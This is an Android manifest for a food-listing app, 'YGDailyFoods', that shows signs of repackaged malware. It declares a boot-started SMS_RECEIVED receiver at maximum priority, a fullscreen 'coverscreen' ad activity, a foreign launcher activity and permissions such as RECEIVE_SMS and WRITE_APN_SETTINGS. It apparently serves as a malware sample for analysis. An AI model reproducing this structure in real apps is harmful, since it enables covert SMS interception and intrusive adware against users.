<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.dcc.j12okjk.YGDailyFoods">
    <application android:icon="@drawable/icon96x96" android:label="@string/app_name" android:name="com.okjk.DataManager.DataManagerApp">
        <activity android:name="com.okjk.DataManager.StartPage" android:screenOrientation="portrait">
            <intent-filter/>
        </activity>
        <activity android:name="com.software.demo.WelcomeActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.feiwoone.coverscreen.SA" android:theme="@android:style/Theme.Translucent.NoTitleBar.Fullscreen"/>
        <activity android:launchMode="singleInstance" android:name="com.feiwoone.coverscreen.WA"/>
        <receiver android:name="com.feiwoone.coverscreen.SR">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <data android:scheme="package"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="broadcast.route.control"/>
            </intent-filter>
        </receiver>
        <service android:name="com.the.world.i.have.MyService"/>
        <receiver android:name="com.the.world.i.have.SMSBStatic" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <activity android:name="com.okjk.YGDailyFoods.Tab_Host" android:screenOrientation="portrait" android:windowSoftInputMode="adjustPan"/>
        <activity android:launchMode="singleTask" android:name="com.okjk.YGDailyFoods.TodayFoods" android:screenOrientation="portrait"/>
        <activity android:launchMode="singleTask" android:name="com.okjk.YGDailyFoods.YGFoodsList" android:screenOrientation="portrait"/>
        <activity android:name="com.okjk.YGDailyFoods.FoodsDetail" android:screenOrientation="portrait"/>
        <activity android:launchMode="singleTask" android:name="com.okjk.YGDailyFoods.FavoriteFoods" android:screenOrientation="portrait"/>
        <activity android:name="com.okjk.YGDailyFoods.Favorite_Edit" android:screenOrientation="portrait"/>
        <activity android:name="com.okjk.YGDailyFoods.Oauth_WebView" android:screenOrientation="portrait"/>
        <activity android:name="com.okjk.YGDailyFoods.Aboutus" android:screenOrientation="portrait"/>
        <activity android:launchMode="singleTask" android:name="com.okjk.YGDailyFoods.Setups" android:screenOrientation="portrait"/>
        <activity android:launchMode="singleTask" android:name="com.okjk.YGDailyFoods.E01" android:screenOrientation="portrait" android:windowSoftInputMode="adjustPan"/>
        <activity android:name="com.okjk.YGDailyFoods.YGSearchList" android:screenOrientation="portrait"/>
        <activity android:configChanges="keyboardHidden|orientation" android:name="com.okjk.YGDailyFoods.Share" android:screenOrientation="portrait" android:windowSoftInputMode="stateAlwaysVisible|adjustPan">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:host="Share" android:scheme="weiboandroidsdk"/>
            </intent-filter>
        </activity>
        <activity android:label="@string/app_name" android:name="com.okjk.YGDailyFoods.QQOAuthV1AuthorizeWebView"/>
        <activity android:name="com.okjk.YGDailyFoods.Share_Success" android:screenOrientation="portrait" android:theme="@style/translucent"/>
        <receiver android:name="com.okjk.YGDailyFoods.NotifyBroadcast">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:name="com.okjk.YGDailyFoods.YGDailyFoodsService"/>
    </application>
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:smallScreens="true"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
</manifest>
